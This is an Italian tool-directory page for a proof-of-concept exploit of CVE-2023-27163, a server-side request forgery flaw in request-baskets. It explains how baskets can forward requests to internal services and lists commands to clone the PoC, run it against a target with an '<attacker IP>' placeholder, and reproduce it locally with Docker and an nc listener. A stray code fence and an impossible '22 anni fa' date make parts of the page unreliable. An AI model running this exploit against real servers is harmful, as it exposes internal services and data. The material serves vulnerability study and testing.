Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-27163 — Prova di concetto per Server Side Request Forgery (SSRF) in request-baskets (V<= v.1.2.1) | Kitploit
Strumenti/GitHubGitHub/mastercode112/cve-2023-27163
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubmastercode112/cve-2023-27163

CVE-2023-27163

Prova di concetto per Server Side Request Forgery (SSRF) in request-baskets (V<= v.1.2.1)

Vedi Repository
22 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Prova di concetto di SSRF su Request-Baskets (CVE-2023-27163)

Questo repository contiene una Prova di concetto (PoC) per CVE-2023-27163, una vulnerabilità di Server-Side Request Forgery (SSRF) scoperta in request-baskets fino alla versione 1.2.1. Questa vulnerabilità consente agli aggressori di accedere a risorse di rete e informazioni sensibili sfruttando il componente /api/baskets/{name} tramite una richiesta API appositamente predisposta.

Utilizzo

root@kitploit:~
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>

Come funziona?

Request-baskets è un'applicazione web progettata per raccogliere e registrare richieste su una rotta specifica, il cosiddetto basket. Quando la si crea, l'utente può specificare un altro server a cui inoltrare la richiesta. Il problema è che l'utente può specificare servizi non desiderati, come applicazioni chiuse alla rete.

Ad esempio: supponiamo che il server ospiti Request-baskets (porta 55555) e un server web Flask sulla porta 8000. Flask è anche configurato per interagire solo con localhost. Creando un basket che inoltra a http://localhost:8000, l'aggressore può accedere al server web Flask precedentemente limitato.

Test in locale

Immagine PoC

  1. Avvia il container Docker di Request-Baskets
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git

2. Scarica la PoC

```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
  1. Attendi una connessione
root@kitploit:~
nc -lvp 8000
  1. Salva l'indirizzo IP dell'host Docker
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. Esegui la PoC
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/
Scarica lo strumento